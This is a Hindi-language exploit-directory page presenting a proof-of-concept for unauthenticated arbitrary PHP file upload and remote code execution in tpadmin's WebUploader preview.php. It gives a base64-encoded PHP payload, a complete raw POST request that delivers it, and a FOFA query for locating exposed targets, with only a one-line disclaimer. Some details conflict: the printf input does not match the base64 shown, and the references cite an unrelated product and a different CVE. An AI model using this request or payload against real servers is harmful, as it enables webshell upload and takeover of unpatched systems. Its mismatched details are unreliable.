Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
tpadmin-CVE-2026-2113-poc — एक रिमोट कोड निष्पादन भेद्यता जो प्रमाणीकरण रहित हमलावरों को सीधे वेब सर्वर पर मनमानी PHP फ़ाइलें अपलोड करने की अनुमति देती है। इसके परिणामस्वरूप वेब सर्वर विशेषाधिकारों के साथ तत्काल रिमोट कोड निष्पादन होता है। | Kitploit
उपकरण/GitHubGitHub/maxmnml/tpadmin-cve-2026-2113-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubmaxmnml/tpadmin-cve-2026-2113-poc

tpadmin-CVE-2026-2113-poc

एक रिमोट कोड निष्पादन भेद्यता जो प्रमाणीकरण रहित हमलावरों को सीधे वेब सर्वर पर मनमानी PHP फ़ाइलें अपलोड करने की अनुमति देती है। इसके परिणामस्वरूप वेब सर्वर विशेषाधिकारों के साथ तत्काल रिमोट कोड निष्पादन होता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
रिपॉजिटरी देखें
17 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

tpadmin-CVE-2026-2113-poc

एक प्रूफ-ऑफ-कॉन्सेप्ट जो मनमाना फ़ाइल अपलोड के माध्यम से वेब सर्वर विशेषाधिकारों के साथ रिमोट कोड निष्पादन का शोषण करता है।

भेद्यता विवरण

H-ui.admin सिस्टम के WebUploader पूर्वावलोकन घटक में एक महत्वपूर्ण रिमोट कोड निष्पादन भेद्यता मौजूद है। <font style="color:rgb(15, 17, 21);background-color:rgb(235, 238, 242);">/public/static/admin/lib/webuploader/0.1.5/server/preview.php</font> फ़ाइल में उचित प्रमाणीकरण और फ़ाइल सत्यापन का अभाव है, जिससे अप्रमाणित हमलावर सीधे वेब सर्वर पर मनमानी PHP फ़ाइलें अपलोड कर सकते हैं। इसके परिणामस्वरूप वेब सर्वर विशेषाधिकारों के साथ तत्काल रिमोट कोड निष्पादन होता है।

प्रभावित संस्करण

  • tpadmin संस्करण 1.3.12 तक

Poc (sTy1H द्वारा)

  1. पेलोड बनाएँ (खतरनाक कथन को base64 में एनकोड करें)
root@kitploit:~
printf "<? php phpinfo();?>" | base64
PD9waHAgcGhwaW5mbygpOz8+
  1. अपने पेलोड के साथ POST अनुरोध बनाएँ
root@kitploit:~
POST /admin/lib/webuploader/0.1.5/server/preview.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: PHPSESSID=6mqs895r9r0k9ci9jj0hms506n
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 46

data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+
  1. लौटाए गए URL पर जाएँ
चित्र

वास्तविक दुनिया में

FOFA:

root@kitploit:~
title='Tpadmin'

प्रभाव

एक अप्रमाणित दूरस्थ हमलावर Arbitrary File Upload का उपयोग करके वेब सर्वर विशेषाधिकारों के साथ RCE प्राप्त कर सकता है।

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P - 6.9:Medium

निवारण एवं शमन

संभावित प्रतिउपायों के बारे में कोई जानकारी उपलब्ध नहीं है। प्रभावित वस्तु को किसी वैकल्पिक उत्पाद से बदलने का सुझाव दिया जा सकता है।

संदर्भ

  • https://github.com/yuan1994/tpAdmin
  • https://www.smartertools.com/smartermail/release-notes/current)
  • https://nvd.nist.gov/vuln/detail/CVE-2026-23760

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। कंप्यूटर सिस्टम में अनधिकृत पहुँच अवैध है।

टूल डाउनलोड करें